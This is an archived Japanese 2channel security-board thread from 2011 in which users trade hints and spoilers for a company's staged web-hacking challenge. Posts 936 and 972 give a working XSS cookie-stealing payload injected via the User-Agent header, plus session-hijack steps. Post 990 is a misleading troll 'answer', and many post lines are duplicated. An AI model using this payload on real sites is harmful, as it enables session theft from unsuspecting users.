おかげでLv5です
なるほどと思ったありがとう
おかげでLv5です
902 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:49:50.67
中の人が「人数増えたし、そろそろLv5破られるかな?」と言っておる。
ってことは、一応脆弱性はちゃんと用意されてるって事なのかな。
ってことは、一応脆弱性はちゃんと用意されてるって事なのかな。
903 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:52:20.35
LV5クリア。また理不尽な問題だったぜ
904 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:53:45.88
>>903
ん、ランキングに表示されてませんが?
ん、ランキングに表示されてませんが?
905 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:54:40.84
Lv4昨日やってだめだったのが通った…
にょきっも笑えねぇよ…
にょきっも笑えねぇよ…
906 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:58:00.76
>>904
おかしいな、バグですかね
おかしいな、バグですかね
907 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:58:50.24
げー。昨日ダメだったの一発で通ったよLv4。
昨日までの正解はどんなのだったんだろう。もはや自力じゃ知るすべがない。
昨日までの正解はどんなのだったんだろう。もはや自力じゃ知るすべがない。
908 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:59:22.33
そろそろLV4の正解も晒そうかな
909 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:00:50.54
ってかさ・・・・なんでもない。
910 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:01:37.07
>>908
ありのままにどうぞw
ありのままにどうぞw
911 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:01:38.69
そこまでして構ってほしいの?
912 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:02:01.72
Lv4 までは正解できないまでも、ざっくり予想はつく範囲だったのに、Lv5 は本当に
取り付くしまも無いな。
取り付くしまも無いな。
913 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:04:25.10
>>908
やめてーーー><
やめてーーー><
914 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:04:51.14
お前ら情報戦は弱いんだな
「さらそうかな」と言ってる奴は解けてない奴
晒したいけど我慢してる奴に「どうせ出るなら俺が晒せば賞賛は俺のもの」と思わせるのが狙い
「さらそうかな」と言ってる奴は解けてない奴
晒したいけど我慢してる奴に「どうせ出るなら俺が晒せば賞賛は俺のもの」と思わせるのが狙い
915 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:04:52.41
>>908
もうすでに晒されてるようなもんだし、別にいらないんじゃね?
もうすでに晒されてるようなもんだし、別にいらないんじゃね?
916 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:06:19.67
情報戦とかいいから改定前の正解晒せよ
917 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:10:24.20
/Lv6/ だと /Lv5 に転送されるけど、
/Lv7/ だと 404 になるから、一応Lv6は存在するのかもしれない・・
/Lv7/ だと 404 になるから、一応Lv6は存在するのかもしれない・・
918 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:12:06.93
改定後の正解知ってるなら
改定前の正解とか簡単に予想つくんでは
改定前の正解とか簡単に予想つくんでは
919 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:13:55.85
つーかcookieのセットすらできない連中がすでにLv4まできてるとか
凄まじいな
凄まじいな
920 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:14:24.93
>>916
改定後もそのまま正解だから晒せねーよ
まあ問題が「>>916のレスを表示せよ」で
要求したURLが
http://hibari.2ch.net/test/read.cgi/sec/1297835390/916- では駄目で
http://hibari.2ch.net/test/read.cgi/sec/1297835390/916 のみが正解だった
理由は916-の方は分散して微妙に見難くなるから
まあその程度の理不尽
改定後もそのまま正解だから晒せねーよ
まあ問題が「>>916のレスを表示せよ」で
要求したURLが
http://hibari.2ch.net/test/read.cgi/sec/1297835390/916- では駄目で
http://hibari.2ch.net/test/read.cgi/sec/1297835390/916 のみが正解だった
理由は916-の方は分散して微妙に見難くなるから
まあその程度の理不尽
921 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:17:19.36
いつの間にやらスレが埋まりそうな感じだな。
922 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:18:26.19
999にLV4の答えを書く
923 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:21:07.04
じゃあLV5のヒント:javascriptエラーがある
924 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:32:11.77
>>923
具体的にどこに?
具体的にどこに?
925 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:44:06.38
まぁLv4に関してはもう答え晒されてるようなもんだしそろそろどっかの誰かがまた「晒されてますよ?」
って中の人にいうんじゃないかと・・・w
って中の人にいうんじゃないかと・・・w
926 :名無しさん@お腹いっぱい:2011/02/25(金) 12:47:42.02
>>922
早くかけよ
早くかけよ
927 :名無しさん@お腹いっぱい:2011/02/25(金) 12:48:38.21
>>922
早くかけよ
早くかけよ
928 :名無しさん@お腹いっぱい:2011/02/25(金) 12:49:00.44
>>922
早くかけよ
早くかけよ
929 :名無しさん@お腹いっぱい:2011/02/25(金) 12:49:45.96
>>922
早くかけよ
早くかけよ
930 :名無しさん@お腹いっぱい:2011/02/25(金) 12:50:17.79
>>922
早くかけよ
早くかけよ
931 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:50:33.07
ネタバレって規約違反じゃね?
932 :名無しさん@お腹いっぱい:2011/02/25(金) 12:50:41.67
>>922
早くかけよ
早くかけよ
933 :名無しさん@お腹いっぱい:2011/02/25(金) 12:51:02.83
>>922
早くかけよ
早くかけよ
934 :名無しさん@お腹いっぱい:2011/02/25(金) 12:51:32.03
>>922
早くかけよ
早くかけよ
935 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:51:52.67
中の人も「やめて><」って言ってるくらいだしなw
正直ただでさえ楽っていうか分かりやすくになったのにこれ以上分からんとか言ってるのは1から勉強しなおせレベル。
正直ただでさえ楽っていうか分かりやすくになったのにこれ以上分からんとか言ってるのは1から勉強しなおせレベル。
936 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:52:39.54
</li><script>document.location="http://(貴方のIP)/cookie.cgi?cookie="+document.cookie;</script><li>
937 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:52:41.79
おい、あんまりいじめてやるなよw
埋め
埋め
938 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:53:35.82
まだ>>999になってないぞ。早漏め
939 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:53:44.20
あーLv5いけたかも。
940 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:54:40.80
>>939
それらしいヒントとかあった?
それらしいヒントとかあった?
941 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:55:08.35
>>939
kwsk
kwsk
942 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:55:10.66
現在LV4総勢148人
↓増え続ける
↓増え続ける
943 :名無しさん@お腹いっぱい。:2011/02/25(金) 12:59:44.18
こんだネタバレあってわかんないのはそもそもxssとか名称だけしっててやってることは理解してないんだろうな
944 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:00:11.30
やった、Lv4通ったー
昨日やって通らなかったはずのが通った
SQLインジェクションとかXSSとか名前だけ知ってる程度の知識だったけど、どういう仕組か理解できたわ
Lv3はUNIXすこし触ったことあったからすぐ理解できた
昨日やって通らなかったはずのが通った
SQLインジェクションとかXSSとか名前だけ知ってる程度の知識だったけど、どういう仕組か理解できたわ
Lv3はUNIXすこし触ったことあったからすぐ理解できた
945 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:02:16.45
Lv3についてはかなり初期の時点で誰かがディレクトリトラバーサルって単語漏らしたからググってクリアしたんだけど、あの人は全然叩かれないんだな
946 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:03:01.82
ネタバレ起きてから合格しても同格とか思わないでほしいんで、その辺夜露死苦
947 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:04:17.69
948 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:09:14.95
あれみてディレクトリトラバーサルと思いつかないような奴は普通Lv3までいけないはずなんだよなww
tempとかUNIXそのまんまだし
tempとかUNIXそのまんまだし
949 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:12:03.75
ディレクトリトラバーサルはネタバレとはいえない
レベルのすぐ分かることだな。
レベル4でネタバレになったのはUAに突っ込むというアイデアだ。
自力で「ウホッ」と気付いたやつは自負していいレベルだけど
ここまできてもクリアできてないやつはもう本筋から離れたレベル。
自分が一番よく分かってるだろうw
レベルのすぐ分かることだな。
レベル4でネタバレになったのはUAに突っ込むというアイデアだ。
自力で「ウホッ」と気付いたやつは自負していいレベルだけど
ここまできてもクリアできてないやつはもう本筋から離れたレベル。
自分が一番よく分かってるだろうw
950 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:12:09.27
>>948
突っ込んでほしいのか?
突っ込んでほしいのか?
951 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:13:19.27
やっぱ時系列は上から下としか思えない
952 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:15:01.66
lv5ェ・・・
953 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:19:17.50
今見たら157人がLv4クリア
流石にだいぶ増えたな
流石にだいぶ増えたな
954 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:20:35.54
俺がuser-agentって書いた時点では10人ぐらいだったのになぁ
955 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:21:46.47
判定基準甘くなったからな・・・昨日ダメなのが今日は行けたし
956 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:21:51.85
まぁ、所詮セキュ板の雑魚どものレベルなんてそんなもんだ
957 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:23:00.68
>>955
そこらへんなんとかして欲しかったよな
そこらへんなんとかして欲しかったよな
958 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:28:37.96
Lv2とLv4はそれぞれ2つか3つくらいのレベルに分けて
手法は同じでも
Lv2-easyはオーソドックスなパターン
Lv2-normalはちょっとひねったパターン
Lv2-hardは珍しいパターン
みたいにすればよかったのにね
これなら途中で判定基準変えたりして文句も言われなかったかも
手法は同じでも
Lv2-easyはオーソドックスなパターン
Lv2-normalはちょっとひねったパターン
Lv2-hardは珍しいパターン
みたいにすればよかったのにね
これなら途中で判定基準変えたりして文句も言われなかったかも
959 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:29:07.06
関係ないけどBackTrackのページの左側に勇気、力、決心って書いてあってワロタ
なんの意味があるんだろうか
なんの意味があるんだろうか
960 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:30:50.42
LV5は株式会社ネットファイアの製品netfire-v1の試験だな
961 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:31:15.37
ランキングの称号が「ハッカーの方々」から「仮免許ハッカーの人」になってるw
962 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:31:32.84
この会社、煽ってくるぞw
963 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:32:25.31
「仮免許ハッカー」です。なかなか。
やりますね。ちゃんと自前でできたかな?チートしちゃだめだよ?
ワロス
やりますね。ちゃんと自前でできたかな?チートしちゃだめだよ?
ワロス
964 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:33:02.56
「仮免許ハッカー」です。なかなか。
やりますね。ちゃんと自前でできたかな?チートしちゃだめだよ?
クソ吹いたwwww
むしろ判定基準がチートだと思うがww
やりますね。ちゃんと自前でできたかな?チートしちゃだめだよ?
クソ吹いたwwww
むしろ判定基準がチートだと思うがww
965 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:33:56.24
中途半端にスクリプト通らないからもうややこしい
って会社が煽るなよwww
って会社が煽るなよwww
966 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:34:34.57
ネタバレ位想定できただろうにw、それで煽ってくるとかw
967 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:34:45.56
ほんとだ、さっきまで
セキュリティ関係なら簡単かな?
みたいな感じのコメントだったのにwww
セキュリティ関係なら簡単かな?
みたいな感じのコメントだったのにwww
968 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:38:00.62
これでまさかのlv5がランキングページ書き換えでした!とかだったらどうしよう・・・
969 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:39:35.82
970 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:40:07.46
自鯖がいるようでいらない、sessionidなようでsessionidじゃない
971 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:43:31.68
やりますね。自分でわかってクリアしたのなら、優秀なハッカーになれるかもしれません。
に変わったw
に変わったw
972 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:43:33.19
■LV4のクリア方法(ネタバレ)
firefoxのアドオンにCS LiteとUser Agent Switcherをインストールします。
んで、User Agent Switcherで新しいUser Agent(以下UA)を作り、User Agentの項目に
</li><script>document.location="http://(貴方のIP)/cookie.cgi?cookie="+document.cookie;</script><li>
と書きます。
そのUAに設定して適当なID・PASSでログインします。
すると左下にセッションIDを盗みました的なAJAXウインドウが出てきます。
盗んだセッションをCS Liteアドオンを使って自分のブラウザのクッキーに登録します。
そして戻るボタンをクリックするとクリアできます。
firefoxのアドオンにCS LiteとUser Agent Switcherをインストールします。
んで、User Agent Switcherで新しいUser Agent(以下UA)を作り、User Agentの項目に
</li><script>document.location="http://(貴方のIP)/cookie.cgi?cookie="+document.cookie;</script><li>
と書きます。
そのUAに設定して適当なID・PASSでログインします。
すると左下にセッションIDを盗みました的なAJAXウインドウが出てきます。
盗んだセッションをCS Liteアドオンを使って自分のブラウザのクッキーに登録します。
そして戻るボタンをクリックするとクリアできます。
973 :名無しさん@お腹いっぱい:2011/02/25(金) 13:43:35.67
m
974 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:43:36.51
>>969
書き換わったw
「仮免許ハッカー」です。なかなか。
やりますね。自分でわかってクリアしたのなら、優秀なハッカーになれるかもしれません。
どうせならクリア時に、お手本を公開すればいいのになぁ(特にlv4)
昨日と今日で判定基準変わってるんだし
書き換わったw
「仮免許ハッカー」です。なかなか。
やりますね。自分でわかってクリアしたのなら、優秀なハッカーになれるかもしれません。
どうせならクリア時に、お手本を公開すればいいのになぁ(特にlv4)
昨日と今日で判定基準変わってるんだし
975 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:44:39.65
結局昨日の答えはなんだったのか気になる。
最後に解答例とか出してほしいな
最後に解答例とか出してほしいな
976 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:45:07.12
>>969
何だこの子素直
何だこの子素直
977 :名無しさん@お腹いっぱい:2011/02/25(金) 13:46:01.77
978 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:48:08.75
煽るくらいならもっと柔軟性を持った判定にしろよなー
979 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:48:28.11
かつてないほどセキュリティ板のアクセスが集中しております
980 :名無しさん@お腹いっぱい:2011/02/25(金) 13:48:57.15
だれか、lv2教えてくれ
981 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:49:36.12
>>980
SQLインジェクション
SQLインジェクション
982 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:49:51.61
Lv2修正された?昨日よりやさしくなってるっぽいけど
983 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:50:20.11
今更LV2の答え教えても目立たないしな。
984 :名無しさん@お腹いっぱい:2011/02/25(金) 13:50:51.20
>>983
じゃ、おしえてくれ
じゃ、おしえてくれ
985 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:50:59.63
煽る煽るw
社員2ch張り付きすぎだろw
社員2ch張り付きすぎだろw
986 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:51:26.73
987 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:52:02.20
そりゃここのスレは重要監視なんじゃね?
lv4も暫定停止フラグだなw
lv4も暫定停止フラグだなw
988 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:52:34.99
本物のハッカーが163人もいるとか不自然だろ。
最初の2〜3人ぐらいが本物なんじゃね
最初の2〜3人ぐらいが本物なんじゃね
989 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:54:33.19
990 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:54:42.78
■LV4のクリア方法(ネタバレ)
おくれましたが公開です。
まずページを開きます。
Explororのアドレス欄に次の文を打ち込みます→javascript:var t="お";var k="えア";var m="ま";var a="ホ";alert(t+m+k+a);document.write(t+m+k+a);
あとでメッセージが出てくるのでそれを読みます。
ほとんどそこまでいけばクリアですよー!
おくれましたが公開です。
まずページを開きます。
Explororのアドレス欄に次の文を打ち込みます→javascript:var t="お";var k="えア";var m="ま";var a="ホ";alert(t+m+k+a);document.write(t+m+k+a);
あとでメッセージが出てくるのでそれを読みます。
ほとんどそこまでいけばクリアですよー!
991 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:55:08.53
LV2合格者って1万人ぐらいいるのかな?
992 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:55:13.74
こんなことだけでハッカーかどうかなんてわからんだろ
993 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:55:28.55
判定が理不尽じゃなければ
Lv4までは解ける範囲だと思うけどなー
Lv4までは解ける範囲だと思うけどなー
994 :名無しさん@お腹いっぱい:2011/02/25(金) 13:55:32.04
スレ読んでもわからん
995 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:57:43.22
このサイトの公開初日にLv2クリアしてたの4人くらいだったな
その最初の4人はLv4でも名前あったからその人達は本当の知識と技術があるひとだな
その最初の4人はLv4でも名前あったからその人達は本当の知識と技術があるひとだな
996 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:58:17.04
>>994
諦めろ
諦めろ
997 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:58:27.63
クッキーの書き換えがわからん
その域に達していないらしい
lv3まではスイスイいけたんだが
webわかんね
その域に達していないらしい
lv3まではスイスイいけたんだが
webわかんね
998 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:58:27.62
LV4も再度やってみたけど、自分IPとdocument.cookieの文字が入ってれば
文法的に間違ってても正解になるみたいね
文法的に間違ってても正解になるみたいね
999 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:58:42.77
>>994
それはさすがに勉強不足なだけなんじゃ・・・。
それはさすがに勉強不足なだけなんじゃ・・・。
1000 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:59:47.46
1000
1001 :1001:
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。
もう書けないので、新しいスレッドを立ててくださいです。。。